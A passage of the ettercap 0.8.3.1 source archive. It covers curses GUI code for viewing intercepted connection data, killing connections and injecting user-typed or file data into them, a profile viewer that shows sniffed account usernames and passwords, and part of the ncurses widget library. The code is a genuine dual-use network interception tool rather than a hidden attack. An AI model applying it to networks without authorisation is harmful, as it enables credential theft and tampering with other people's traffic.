curr_conn->flags |= CONN_VIEWING; wdg_create_object(&wdg_conndata, WDG_COMPOUND, WDG_OBJ_WANT_FOCUS); wdg_set_color(wdg_conndata, WDG_COLOR_SCREEN, EC_COLOR); wdg_set_color(wdg_conndata, WDG_COLOR_WINDOW, EC_COLOR); wdg_set_color(wdg_conndata, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_color(wdg_conndata, WDG_COLOR_TITLE, EC_COLOR_TITLE); wdg_set_title(wdg_conndata, "Connection data", WDG_ALIGN_LEFT); wdg_set_size(wdg_conndata, 1, 2, -1, SYSMSG_WIN_SIZE - 1); wdg_create_object(&wdg_join, WDG_SCROLL, 0); snprintf(title, 64, "%s:%d - %s:%d", ip_addr_ntoa(&curr_conn->L3_addr1, src), ntohs(curr_conn->L4_addr1), ip_addr_ntoa(&curr_conn->L3_addr2, dst), ntohs(curr_conn->L4_addr2)); wdg_set_title(wdg_join, title, WDG_ALIGN_LEFT); wdg_set_color(wdg_join, WDG_COLOR_TITLE, EC_COLOR_TITLE); wdg_set_color(wdg_join, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_size(wdg_join, 2, 3, -2, SYSMSG_WIN_SIZE - 2); /* set the buffers */ wdg_scroll_set_lines(wdg_join, EC_GBL_CONF->connection_buffer / (current_screen.cols / 2) ); /* link the widget together within the compound */ wdg_compound_add(wdg_conndata, wdg_join); /* add the destroy callback */ wdg_add_destroy_key(wdg_conndata, CTRL('Q'), curses_destroy_conndata); /* * do not add inject callback because we can determine where to inject in * joined mode... */ wdg_compound_add_callback(wdg_conndata, 'j', curses_connection_data_split); wdg_compound_add_callback(wdg_conndata, 'k', curses_connection_kill_wrapper); wdg_compound_add_callback(wdg_conndata, ' ', curses_connection_data_help); wdg_draw_object(wdg_conndata); wdg_set_focus(wdg_conndata); /* print the old data */ connbuf_print(&curr_conn->data, join_print); /* add the hook on the connection to receive data only from it */ conntrack_hook_conn_add(curr_conn, join_print_po); } static void join_print(u_char *text, size_t len, struct ip_addr *L3_src) { int ret; /* check the regex filter */ if (EC_GBL_OPTIONS->regex && regexec(EC_GBL_OPTIONS->regex, (const char*)text, 0, NULL, 0) != 0) { return; } /* use the global to reuse the same memory region */ SAFE_REALLOC(dispbuf, hex_len(len) * sizeof(u_char) + 1); /* format the data */ ret = EC_GBL_FORMAT(text, len, dispbuf); dispbuf[ret] = 0; if (!ip_addr_cmp(L3_src, &curr_conn->L3_addr1)) wdg_scroll_print(wdg_join, EC_COLOR_JOIN1, "%s", dispbuf); else wdg_scroll_print(wdg_join, EC_COLOR_JOIN2, "%s", dispbuf); } static void join_print_po(struct packet_object *po) { int ret; /* check if the object exists */ if (wdg_conndata == NULL || wdg_join == NULL) return; /* if not focused don't refresh it */ if (!(wdg_conndata->flags & WDG_OBJ_FOCUSED)) return; /* check the regex filter */ if (EC_GBL_OPTIONS->regex && regexec(EC_GBL_OPTIONS->regex, (const char*)po->DATA.disp_data, 0, NULL, 0) != 0) { return; } /* use the global to reuse the same memory region */ SAFE_REALLOC(dispbuf, hex_len(po->DATA.disp_len) * sizeof(u_char) + 1); /* format the data */ ret = EC_GBL_FORMAT(po->DATA.disp_data, po->DATA.disp_len, dispbuf); dispbuf[ret] = 0; if (!ip_addr_cmp(&po->L3.src, &curr_conn->L3_addr1)) wdg_scroll_print(wdg_join, EC_COLOR_JOIN1, "%s", dispbuf); else wdg_scroll_print(wdg_join, EC_COLOR_JOIN2, "%s", dispbuf); } /* * kill the selected connection connection */ static void curses_connection_kill(void *conn) { struct conn_tail *c = (struct conn_tail *)conn; DEBUG_MSG("curses_connection_kill"); /* kill it */ switch (user_kill(c->co)) { case E_SUCCESS: /* set the status */ c->co->status = CONN_KILLED; curses_message("The connection was killed !!"); break; case -E_FATAL: curses_message("Cannot kill UDP connections !!"); break; } } /* * delete the entire list */ static void curses_connection_purge(void *conn) { /* variable not used */ (void) conn; DEBUG_MSG("curses_connection_purge"); conntrack_purge(); refresh_connections(); } /* * call the specialized funtion as this is a callback * without the parameter */ static void curses_connection_kill_wrapper(void) { struct conn_tail c; DEBUG_MSG("curses_connection_kill_wrapper"); /* create the fake conn_tail object */ c.co = curr_conn; curses_connection_kill(&c); } /* * inject interactively with the user */ static void curses_connection_inject(void) { wdg_t *in; DEBUG_MSG("curses_connection_inject"); SAFE_REALLOC(injectbuf, 501 * sizeof(char)); memset(injectbuf, 0, 501); wdg_create_object(&in, WDG_INPUT, WDG_OBJ_WANT_FOCUS | WDG_OBJ_FOCUS_MODAL); wdg_set_color(in, WDG_COLOR_SCREEN, EC_COLOR); wdg_set_color(in, WDG_COLOR_WINDOW, EC_COLOR); wdg_set_color(in, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_color(in, WDG_COLOR_TITLE, EC_COLOR_MENU); wdg_input_size(in, 75, 12); wdg_input_add(in, 1, 1, "Chars to be injected :", (char*)injectbuf, 50, 10); wdg_input_set_callback(in, inject_user); wdg_draw_object(in); wdg_set_focus(in); } static void inject_user(void) { size_t len; /* escape the sequnces in the buffer */ len = strescape((char*)injectbuf, (char*)injectbuf, strlen(injectbuf)+1); /* check where to inject */ if (wdg_c1->flags & WDG_OBJ_FOCUSED) { user_inject(injectbuf, len, curr_conn, 1); } else if (wdg_c2->flags & WDG_OBJ_FOCUSED) { user_inject(injectbuf, len, curr_conn, 2); } } /* * inject form a file */ static void curses_connection_inject_file(void) { wdg_t *fop; DEBUG_MSG("curses_connection_inject_file"); wdg_create_object(&fop, WDG_FILE, WDG_OBJ_WANT_FOCUS | WDG_OBJ_FOCUS_MODAL); wdg_set_title(fop, "Select a file to inject...", WDG_ALIGN_LEFT); wdg_set_color(fop, WDG_COLOR_SCREEN, EC_COLOR); wdg_set_color(fop, WDG_COLOR_WINDOW, EC_COLOR_MENU); wdg_set_color(fop, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_color(fop, WDG_COLOR_TITLE, EC_COLOR_TITLE); wdg_file_set_callback(fop, inject_file); wdg_draw_object(fop); wdg_set_focus(fop); } /* * map the file into memory and pass the buffer to the inject function */ static void inject_file(const char *path, char *file) { char *filename; int fd; void *buf; size_t size, ret; DEBUG_MSG("inject_file %s/%s", path, file); SAFE_CALLOC(filename, strlen(path)+strlen(file)+2, sizeof(char)); snprintf(filename, strlen(path)+strlen(file)+2, "%s/%s", path, file); /* open the file */ if ((fd = open(filename, O_RDONLY | O_BINARY)) == -1) { ui_error("Can't load the file"); return; } SAFE_FREE(filename); /* calculate the size of the file */ size = lseek(fd, 0, SEEK_END); /* load the file in memory */ SAFE_CALLOC(buf, size, sizeof(char)); /* rewind the pointer */ lseek(fd, 0, SEEK_SET); ret = read(fd, buf, size); close(fd); if (ret != size) { ui_error("Cannot read the file into memory"); return; } /* check where to inject */ if (wdg_c1->flags & WDG_OBJ_FOCUSED) { user_inject(buf, size, curr_conn, 1); } else if (wdg_c2->flags & WDG_OBJ_FOCUSED) { user_inject(buf, size, curr_conn, 2); } SAFE_FREE(buf); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/curses/ec_curses_view_profiles.c000664 000000 000000 00000022161 13711276346 024756 0ustar00rootroot000000 000000 /* ettercap -- curses GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include #include /* proto */ void curses_show_profiles(void); static void curses_kill_profiles(void); static void refresh_profiles(void); static void curses_profile_detail(void *profile); static void curses_profiles_local(void *dummy); static void curses_profiles_remote(void *dummy); static void curses_profiles_convert(void *dummy); static void curses_profiles_dump(void *dummy); static void dump_profiles(void); static void curses_profiles_help(void *dummy); /* globals */ static wdg_t *wdg_profiles, *wdg_pro_detail; static char *logfile; /*******************************************/ /* * the auto-refreshing list of profiles */ void curses_show_profiles(void) { DEBUG_MSG("curses_show_profiles"); /* if the object already exist, set the focus to it */ if (wdg_profiles) { wdg_set_focus(wdg_profiles); return; } wdg_create_object(&wdg_profiles, WDG_DYNLIST, WDG_OBJ_WANT_FOCUS); wdg_set_title(wdg_profiles, "Collected passive profiles:", WDG_ALIGN_LEFT); wdg_set_size(wdg_profiles, 1, 2, -1, SYSMSG_WIN_SIZE - 1); wdg_set_color(wdg_profiles, WDG_COLOR_SCREEN, EC_COLOR); wdg_set_color(wdg_profiles, WDG_COLOR_WINDOW, EC_COLOR); wdg_set_color(wdg_profiles, WDG_COLOR_BORDER, EC_COLOR_BORDER); wdg_set_color(wdg_profiles, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_color(wdg_profiles, WDG_COLOR_TITLE, EC_COLOR_TITLE); wdg_draw_object(wdg_profiles); wdg_set_focus(wdg_profiles); /* set the list print callback */ wdg_dynlist_print_callback(wdg_profiles, profile_print); /* set the select callback */ wdg_dynlist_select_callback(wdg_profiles, curses_profile_detail); /* add the callback on idle to refresh the profile list */ wdg_add_idle_callback(refresh_profiles); /* add the destroy callback */ wdg_add_destroy_key(wdg_profiles, CTRL('Q'), curses_kill_profiles); wdg_dynlist_add_callback(wdg_profiles, 'l', curses_profiles_local); wdg_dynlist_add_callback(wdg_profiles, 'r', curses_profiles_remote); wdg_dynlist_add_callback(wdg_profiles, 'c', curses_profiles_convert); wdg_dynlist_add_callback(wdg_profiles, 'd', curses_profiles_dump); wdg_dynlist_add_callback(wdg_profiles, ' ', curses_profiles_help); } static void curses_kill_profiles(void) { DEBUG_MSG("curses_kill_profiles"); wdg_del_idle_callback(refresh_profiles); /* the object does not exist anymore */ wdg_profiles = NULL; } static void curses_profiles_help(void *dummy) { /* variable not used */ (void) dummy; char help[] = "HELP: shortcut list:\n\n" " ENTER - show the infos about the host\n" " l - remove the remote hosts from the list\n" " r - remove the local hosts from the list\n" " c - convert the profile list into hosts list\n" " d - dump the profiles information to a file"; curses_message(help); } static void refresh_profiles(void) { /* if not focused don't refresh it */ if (!(wdg_profiles->flags & WDG_OBJ_FOCUSED)) return; wdg_dynlist_refresh(wdg_profiles); } /* * display details for a profile */ static void curses_profile_detail(void *profile) { struct host_profile *h = (struct host_profile *)profile; struct open_port *o; struct active_user *u; char tmp[MAX_ASCII_ADDR_LEN]; char os[OS_LEN+1]; DEBUG_MSG("curses_profile_detail"); /* if the object already exist, set the focus to it */ if (wdg_pro_detail) { wdg_destroy_object(&wdg_pro_detail); wdg_pro_detail = NULL; } wdg_create_object(&wdg_pro_detail, WDG_SCROLL, WDG_OBJ_WANT_FOCUS); wdg_set_title(wdg_pro_detail, "Profile details:", WDG_ALIGN_LEFT); wdg_set_size(wdg_pro_detail, 1, 2, -1, SYSMSG_WIN_SIZE - 1); wdg_set_color(wdg_pro_detail, WDG_COLOR_SCREEN, EC_COLOR); wdg_set_color(wdg_pro_detail, WDG_COLOR_WINDOW, EC_COLOR); wdg_set_color(wdg_pro_detail, WDG_COLOR_BORDER, EC_COLOR_BORDER); wdg_set_color(wdg_pro_detail, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_color(wdg_pro_detail, WDG_COLOR_TITLE, EC_COLOR_TITLE); wdg_draw_object(wdg_pro_detail); wdg_set_focus(wdg_pro_detail); wdg_add_destroy_key(wdg_pro_detail, CTRL('Q'), NULL); wdg_scroll_set_lines(wdg_pro_detail, 100); memset(os, 0, sizeof(os)); wdg_scroll_print(wdg_pro_detail, EC_COLOR, " IP address : %s \n", ip_addr_ntoa(&h->L3_addr, tmp)); if (strcmp(h->hostname, "")) wdg_scroll_print(wdg_pro_detail, EC_COLOR, " Hostname : %s \n", h->hostname); #ifdef HAVE_GEOIP if (EC_GBL_CONF->geoip_support_enable) wdg_scroll_print(wdg_pro_detail, EC_COLOR, " Location : %s \n", geoip_country_by_ip(&h->L3_addr)); #endif wdg_scroll_print(wdg_pro_detail, EC_COLOR, "\n"); if (h->type & FP_HOST_LOCAL || h->type == FP_UNKNOWN) { wdg_scroll_print(wdg_pro_detail, EC_COLOR, " MAC address : %s \n", mac_addr_ntoa(h->L2_addr, tmp)); wdg_scroll_print(wdg_pro_detail, EC_COLOR, " MANUFACTURER : %s \n\n", manuf_search((const char*)h->L2_addr)); } wdg_scroll_print(wdg_pro_detail, EC_COLOR, " DISTANCE : %d \n", h->distance); if (h->type & FP_GATEWAY) wdg_scroll_print(wdg_pro_detail, EC_COLOR, " TYPE : GATEWAY\n\n"); else if (h->type & FP_HOST_LOCAL) wdg_scroll_print(wdg_pro_detail, EC_COLOR, " TYPE : LAN host\n\n"); else if (h->type & FP_ROUTER) wdg_scroll_print(wdg_pro_detail, EC_COLOR, " TYPE : REMOTE ROUTER\n\n"); else if (h->type & FP_HOST_NONLOCAL) wdg_scroll_print(wdg_pro_detail, EC_COLOR, " TYPE : REMOTE host\n\n"); else if (h->type == FP_UNKNOWN) wdg_scroll_print(wdg_pro_detail, EC_COLOR, " TYPE : unknown\n\n"); if (h->os) wdg_scroll_print(wdg_pro_detail, EC_COLOR, " OBSERVED OS : %s\n\n", h->os); wdg_scroll_print(wdg_pro_detail, EC_COLOR, " FINGERPRINT : %s\n", h->fingerprint); if (fingerprint_search((const char*)h->fingerprint, os) == E_SUCCESS) wdg_scroll_print(wdg_pro_detail, EC_COLOR, " OPERATING SYSTEM : %s \n\n", os); else { wdg_scroll_print(wdg_pro_detail, EC_COLOR, " OPERATING SYSTEM : unknown fingerprint (please submit it) \n"); wdg_scroll_print(wdg_pro_detail, EC_COLOR, " NEAREST ONE IS : %s \n\n", os); } LIST_FOREACH(o, &(h->open_ports_head), next) { wdg_scroll_print(wdg_pro_detail, EC_COLOR, " PORT : %s %d | %s \t[%s]\n", (o->L4_proto == NL_TYPE_TCP) ? "TCP" : "UDP" , ntohs(o->L4_addr), service_search(o->L4_addr, o->L4_proto), (o->banner) ? o->banner : ""); LIST_FOREACH(u, &(o->users_list_head), next) { if (u->failed) wdg_scroll_print(wdg_pro_detail, EC_COLOR, " ACCOUNT : * %s / %s (%s)\n", u->user, u->pass, ip_addr_ntoa(&u->client, tmp)); else wdg_scroll_print(wdg_pro_detail, EC_COLOR, " ACCOUNT : %s / %s (%s)\n", u->user, u->pass, ip_addr_ntoa(&u->client, tmp)); if (u->info) wdg_scroll_print(wdg_pro_detail, EC_COLOR, " INFO : %s\n\n", u->info); else wdg_scroll_print(wdg_pro_detail, EC_COLOR, "\n"); } } } static void curses_profiles_local(void *dummy) { /* variable not used */ (void) dummy; profile_purge_remote(); wdg_dynlist_reset(wdg_profiles); wdg_dynlist_refresh(wdg_profiles); } static void curses_profiles_remote(void *dummy) { /* variable not used */ (void) dummy; profile_purge_local(); wdg_dynlist_reset(wdg_profiles); wdg_dynlist_refresh(wdg_profiles); } static void curses_profiles_convert(void *dummy) { /* variable not used */ (void) dummy; profile_convert_to_hostlist(); curses_message("The hosts list was populated with local profiles"); } static void curses_profiles_dump(void *dummy) { /* variable not used */ (void) dummy; DEBUG_MSG("curses_profiles_dump"); /* make sure to free if already set */ SAFE_FREE(logfile); SAFE_CALLOC(logfile, 50, sizeof(char)); curses_input("Log File :", logfile, 50, dump_profiles); } static void dump_profiles(void) { /* dump the profiles */ if (profile_dump_to_file(logfile) == E_SUCCESS) curses_message("Profiles dumped to file"); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/curses/widgets/000775 000000 000000 00000000000 13711276346 021346 5ustar00rootroot000000 000000 ettercap-0.8.3.1/src/interfaces/curses/widgets/README000664 000000 000000 00000002453 13711276346 022232 0ustar00rootroot000000 000000 ============================================================================== ============================================================================== libwdg a collection of widgets for ncurses Copyright 2003-2004 ALoR ============================================================================== ============================================================================== I've started to write this library to "make the things easier" for me while coding the ettercap NG curses interface. While coding this collection of widgets, I've decided to make it a separate library from ettercap, and I've removed any dependency on it. Only the configure script is shared. Someday, probably I'll distribute this library as a separate project. For now, I don't have time to maintain another projects with all the consequences that this implies. No documentation is provided, sorry. But if you understand how to use these functions looking at the ettercap code, you can use the library in your own projects. Drop me an email if you are interested in this project. ============================================================================== vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/curses/widgets/wdg.c000664 000000 000000 00000052517 13711276346 022305 0ustar00rootroot000000 000000 /* WDG -- widgets helper for ncurses Copyright (C) ALoR This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* GLOBALS */ /* mutexes */ static pthread_mutex_t wdg_mutex = PTHREAD_MUTEX_INITIALIZER; #define WDG_LOCK do { pthread_mutex_lock(&wdg_mutex); } while (0) #define WDG_UNLOCK do { pthread_mutex_unlock(&wdg_mutex); } while (0) /* information about the current screen */ struct wdg_scr current_screen; /* called when idle */ struct wdg_call_list { void (*idle_callback)(void); SLIST_ENTRY(wdg_call_list) next; }; static SLIST_HEAD(, wdg_call_list) wdg_callbacks_list; /* the root object (usually the menu) */ static struct wdg_object *wdg_root_obj; /* the focus list */ struct wdg_obj_list { struct wdg_object *wo; TAILQ_ENTRY(wdg_obj_list) next; }; static TAILQ_HEAD(wol, wdg_obj_list) wdg_objects_list = TAILQ_HEAD_INITIALIZER(wdg_objects_list); /* the currently focused object */ static struct wdg_obj_list *wdg_focused_obj; /* pressing this key, the event_handler will exit */ static int wdg_exit_key; /* PROTOS */ static void wdg_dispatch_msg(int key, struct wdg_mouse_event *mouse); static void wdg_switch_focus(int type); #define SWITCH_FOREWARD 1 #define SWITCH_BACKWARD 2 /* creation function from other widgets */ extern void wdg_create_compound(struct wdg_object *wo); extern void wdg_create_window(struct wdg_object *wo); extern void wdg_create_panel(struct wdg_object *wo); extern void wdg_create_scroll(struct wdg_object *wo); extern void wdg_create_menu(struct wdg_object *wo); extern void wdg_create_dialog(struct wdg_object *wo); extern void wdg_create_percentage(struct wdg_object *wo); extern void wdg_create_file(struct wdg_object *wo); extern void wdg_create_input(struct wdg_object *wo); extern void wdg_create_list(struct wdg_object *wo); extern void wdg_create_dynlist(struct wdg_object *wo); /*******************************************/ /* * init the widgets interface */ void wdg_init(void) { WDG_DEBUG_INIT(); WDG_DEBUG_MSG("wdg_init: setting up the term..."); /* initialize the curses interface */ initscr(); /* disable buffering until carriage return */ cbreak(); /* disable echo of typed chars */ noecho(); /* better compatibility with return key */ nonl(); /* set controlling key (^C^X^Z^S^Q) uninterpreted */ raw(); /* set the non-blocking timeout (10th of seconds) */ halfdelay(WDG_INPUT_TIMEOUT); /* don't flush input on break */ intrflush(stdscr, FALSE); /* enable function and arrow keys */ keypad(stdscr, TRUE); /* activate colors if available */ if (has_colors()) { current_screen.flags |= WDG_SCR_HAS_COLORS; start_color(); } /* hide the cursor */ curs_set(FALSE); /* remember the current screen size */ getmaxyx(stdscr, current_screen.lines, current_screen.cols); /* the wdg is initialized */ current_screen.flags |= WDG_SCR_INITIALIZED; /* clear the screen */ clear(); /* sync the virtual and the physical screen */ refresh(); #ifdef NCURSES_MOUSE_VERSION /* activate the mask to receive mouse events */ mousemask(ALL_MOUSE_EVENTS, (mmask_t *) 0); #endif WDG_DEBUG_MSG("wdg_init: initialized"); } /* * cleanup the widgets interface */ void wdg_cleanup(void) { /* can only cleanup if it was initialized */ if (!(current_screen.flags & WDG_SCR_INITIALIZED)) return; WDG_DEBUG_MSG("wdg_cleanup"); /* show the cursor */ curs_set(TRUE); /* clear the screen */ clear(); /* do the refresh */ refresh(); /* end the curses interface */ endwin(); /* wdg is not initialized */ current_screen.flags &= ~WDG_SCR_INITIALIZED; #ifdef NCURSES_MOUSE_VERSION /* reset the mouse event reception */ mousemask(0, (mmask_t *) 0); #endif WDG_DEBUG_CLOSE(); } /* * used to exit from the events_handler. * this function will put in the input buffer * the exit key, so the handler will get it * and perfrom a clean exit */ void wdg_exit(void) { WDG_DEBUG_MSG("wdg_exit"); /* put the exit key in the input buffer */ ungetch(wdg_exit_key); } /* * update the screen */ void wdg_update_screen(void) { WDG_LOCK; doupdate(); WDG_UNLOCK; } /* * called upon screen resize */ void wdg_redraw_all(void) { struct wdg_obj_list *wl; WDG_DEBUG_MSG("wdg_redraw_all"); /* remember the current screen size */ getmaxyx(stdscr, current_screen.lines, current_screen.cols); /* call the redraw function upon all the objects */ TAILQ_FOREACH(wl, &wdg_objects_list, next) { WDG_BUG_IF(wl->wo->redraw == NULL); WDG_EXECUTE(wl->wo->redraw, wl->wo); } } /* * this function handles all the inputed keys * from the user and dispatches them to the * wdg objects */ int wdg_events_handler(int exit_key) { int key; struct wdg_mouse_event mouse; WDG_DEBUG_MSG("wdg_events_handler (%c)", exit_key); /* set the global exit key (used by wdg_exit()) */ wdg_exit_key = exit_key; /* infinite loop */ WDG_LOOP { /* get the input from user */ key = wgetch(stdscr); switch (key) { case KEY_TAB: /* switch focus between objects */ wdg_switch_focus(SWITCH_FOREWARD); /* update the screen */ WDG_LOCK; doupdate(); WDG_UNLOCK; break; case KEY_CTRL_L: /* redrawing the screen is equivalent to resizing it */ case KEY_RESIZE: /* the screen has been resized */ wdg_redraw_all(); /* update the screen */ WDG_LOCK; doupdate(); WDG_UNLOCK; break; case ERR: /* * non-blocking input reached the timeout: * call the idle function if present, else * sleep to not eat up all the cpu */ if (SLIST_EMPTY(&wdg_callbacks_list)) { /* sleep for milliseconds */ napms(WDG_INPUT_TIMEOUT * 10); /* XXX - too many refresh ? */ refresh(); } else { struct wdg_call_list *cl; SLIST_FOREACH(cl, &wdg_callbacks_list, next) cl->idle_callback(); } /* * update the screen. * all the function uses wnoutrefresh() funcions */ WDG_LOCK; doupdate(); WDG_UNLOCK; break; default: /* emergency exit key */ if (key == wdg_exit_key) return WDG_E_SUCCESS; #ifdef NCURSES_MOUSE_VERSION /* handle mouse events */ if (key == KEY_MOUSE) { MEVENT event; getmouse(&event); mouse_trafo(&event.y, &event.x, TRUE); mouse.x = event.x; mouse.y = event.y; mouse.event = event.bstate; } #else /* we don't support mouse events */ memset(&mouse, 0, sizeof(mouse)); #endif /* dispatch the user input */ wdg_dispatch_msg(key, &mouse); /* update the screen */ WDG_LOCK; doupdate(); WDG_UNLOCK; break; } } /* NOT REACHED */ return WDG_E_SUCCESS; } /* * add a function to the idle callbacks list */ void wdg_add_idle_callback(void (*callback)(void)) { struct wdg_call_list *cl; WDG_DEBUG_MSG("wdg_add_idle_callback (%p)", callback); WDG_SAFE_CALLOC(cl, 1, sizeof(struct wdg_call_list)); /* store the callback */ cl->idle_callback = callback; /* insert in the list */ SLIST_INSERT_HEAD(&wdg_callbacks_list, cl, next); } /* * delete a function from the callbacks list */ void wdg_del_idle_callback(void (*callback)(void)) { struct wdg_call_list *cl; WDG_DEBUG_MSG("wdg_del_idle_callback (%p)", callback); SLIST_FOREACH(cl, &wdg_callbacks_list, next) { if (cl->idle_callback == callback) { SLIST_REMOVE(&wdg_callbacks_list, cl, wdg_call_list, next); WDG_SAFE_FREE(cl); return; } } } /* * dispatch the user input to the list of objects. * first dispatch to the root_obj, if not handled * dispatch to the focused object. */ static void wdg_dispatch_msg(int key, struct wdg_mouse_event *mouse) { /* the focused object is modal ! send only to it */ if (wdg_focused_obj && (wdg_focused_obj->wo->flags & WDG_OBJ_FOCUS_MODAL)) { /* check the destroy callback */ if (wdg_focused_obj->wo && key == wdg_focused_obj->wo->destroy_key) { struct wdg_object *wo = wdg_focused_obj->wo; WDG_DEBUG_MSG("wdg_destroy_callback (%p)", wo); WDG_EXECUTE(wdg_focused_obj->wo->destroy_callback); wdg_destroy_object(&wo); wdg_redraw_all(); /* object was destroyed */ return; } /* deliver the message normally */ wdg_focused_obj->wo->get_msg(wdg_focused_obj->wo, key, mouse); /* other objects must not receive the msg */ return; } /* * if it is a mouse event, we have to dispatch to all * the object in the list until someone handles it */ if (key == KEY_MOUSE) { struct wdg_obj_list *wl; /* * first dispatch to the root object, * since it is usually a menu, it may overlap * other objects and needs to get the event first */ if (wdg_root_obj != NULL) { if (wdg_root_obj->get_msg(wdg_root_obj, key, mouse) == WDG_E_SUCCESS) /* the root object handled the message */ return; } /* * then dispatch to the focused object. * it may overlap and needs to event before the others * to prevent an undesired raising of underlaying objects */ if (wdg_focused_obj != NULL) { if (wdg_focused_obj->wo->get_msg(wdg_focused_obj->wo, key, mouse) == WDG_E_SUCCESS) /* the focused object handled the message */ return; } /* dispatch to all the other objects */ TAILQ_FOREACH(wl, &wdg_objects_list, next) { if ((wl->wo->flags & WDG_OBJ_WANT_FOCUS) && (wl->wo->flags & WDG_OBJ_VISIBLE) ) { if (wl->wo->get_msg(wl->wo, key, mouse) == WDG_E_SUCCESS) return; } } /* it is a keyboard event */ } else { /* first dispatch to the root object */ if (wdg_root_obj != NULL) { if (wdg_root_obj->get_msg(wdg_root_obj, key, mouse) == WDG_E_SUCCESS) /* the root object handled the message */ return; /* check the destroy callback */ if (key == wdg_root_obj->destroy_key) { WDG_EXECUTE(wdg_root_obj->destroy_callback); wdg_destroy_object(&wdg_root_obj); wdg_redraw_all(); return; } } /* * the root_object has not handled it. * dispatch to the focused one */ if (wdg_focused_obj != NULL) { if (wdg_focused_obj->wo->get_msg(wdg_focused_obj->wo, key, mouse) == WDG_E_SUCCESS) /* the focused object handled the message */ return; /* check the destroy callback */ if (wdg_focused_obj->wo && key == wdg_focused_obj->wo->destroy_key) { struct wdg_object *wo = wdg_focused_obj->wo; WDG_EXECUTE(wdg_focused_obj->wo->destroy_callback); wdg_destroy_object(&wo); wdg_redraw_all(); return; } } /* noone handled the message, flash an error */ flash(); beep(); } } /* * move the focus to the next object. * only WDG_OBJ_WANT_FOCUS could get the focus */ static void wdg_switch_focus(int type) { struct wdg_obj_list *wl; /* the focused object is modal ! don't switch */ if (wdg_focused_obj && (wdg_focused_obj->wo->flags & WDG_OBJ_FOCUS_MODAL)) return; /* if there is not a focused object, create it */ if (wdg_focused_obj == NULL) { /* search the first "focusable" object */ TAILQ_FOREACH(wl, &wdg_objects_list, next) { if ((wl->wo->flags & WDG_OBJ_WANT_FOCUS) && (wl->wo->flags & WDG_OBJ_VISIBLE) ) { /* set the focused object */ wdg_focused_obj = wl; /* focus current object */ WDG_BUG_IF(wdg_focused_obj->wo->get_focus == NULL); WDG_EXECUTE(wdg_focused_obj->wo->get_focus, wdg_focused_obj->wo); return; } } } /* unfocus the current object */ WDG_BUG_IF(wdg_focused_obj->wo->lost_focus == NULL); WDG_EXECUTE(wdg_focused_obj->wo->lost_focus, wdg_focused_obj->wo); /* * focus the next/prev element in the list. * only focus objects that have the WDG_OBJ_WANT_FOCUS flag */ do { switch (type) { case SWITCH_FOREWARD: wdg_focused_obj = TAILQ_NEXT(wdg_focused_obj, next); /* we are at the end, move to the first element */ if (wdg_focused_obj == TAILQ_END(&wdg_objects_list)) wdg_focused_obj = TAILQ_FIRST(&wdg_objects_list); break; case SWITCH_BACKWARD: /* we are on the head, move to the last element */ if (wdg_focused_obj == TAILQ_FIRST(&wdg_objects_list)) wdg_focused_obj = TAILQ_LAST(&wdg_objects_list, wol); else wdg_focused_obj = TAILQ_PREV(wdg_focused_obj, wol, next); break; } } while ( !(wdg_focused_obj->wo->flags & WDG_OBJ_WANT_FOCUS) || !(wdg_focused_obj->wo->flags & WDG_OBJ_VISIBLE) ); /* focus current object */ WDG_BUG_IF(wdg_focused_obj->wo->get_focus == NULL); WDG_EXECUTE(wdg_focused_obj->wo->get_focus, wdg_focused_obj->wo); } /* * set focus to the given object */ void wdg_set_focus(struct wdg_object *wo) { struct wdg_obj_list *wl; /* search the object and focus it */ TAILQ_FOREACH(wl, &wdg_objects_list, next) { if ( wl->wo == wo ) { /* unfocus the current object */ if (wdg_focused_obj) WDG_EXECUTE(wdg_focused_obj->wo->lost_focus, wdg_focused_obj->wo); /* set the focused object */ wdg_focused_obj = wl; /* focus current object */ WDG_BUG_IF(wdg_focused_obj->wo->get_focus == NULL); WDG_EXECUTE(wdg_focused_obj->wo->get_focus, wdg_focused_obj->wo); return; } } } /* * create a wdg object */ int wdg_create_object(struct wdg_object **wo, size_t type, size_t flags) { struct wdg_obj_list *wl; WDG_DEBUG_MSG("wdg_create_object (%d)", type); /* alloc the struct */ WDG_SAFE_CALLOC(*wo, 1, sizeof(struct wdg_object)); /* set the flags */ (*wo)->flags = flags; (*wo)->type = type; /* call the specific function */ switch (type) { case WDG_COMPOUND: wdg_create_compound(*wo); break; case WDG_WINDOW: wdg_create_window(*wo); break; case WDG_PANEL: wdg_create_panel(*wo); break; case WDG_SCROLL: wdg_create_scroll(*wo); break; case WDG_MENU: wdg_create_menu(*wo); break; case WDG_DIALOG: wdg_create_dialog(*wo); break; case WDG_PERCENTAGE: wdg_create_percentage(*wo); break; case WDG_FILE: wdg_create_file(*wo); break; case WDG_INPUT: wdg_create_input(*wo); break; case WDG_LIST: wdg_create_list(*wo); break; case WDG_DYNLIST: wdg_create_dynlist(*wo); break; default: WDG_SAFE_FREE(*wo); return -WDG_E_FATAL; break; } /* alloc the element in the object list */ WDG_SAFE_CALLOC(wl, 1, sizeof(struct wdg_obj_list)); /* link the object */ wl->wo = *wo; /* insert it in the list */ 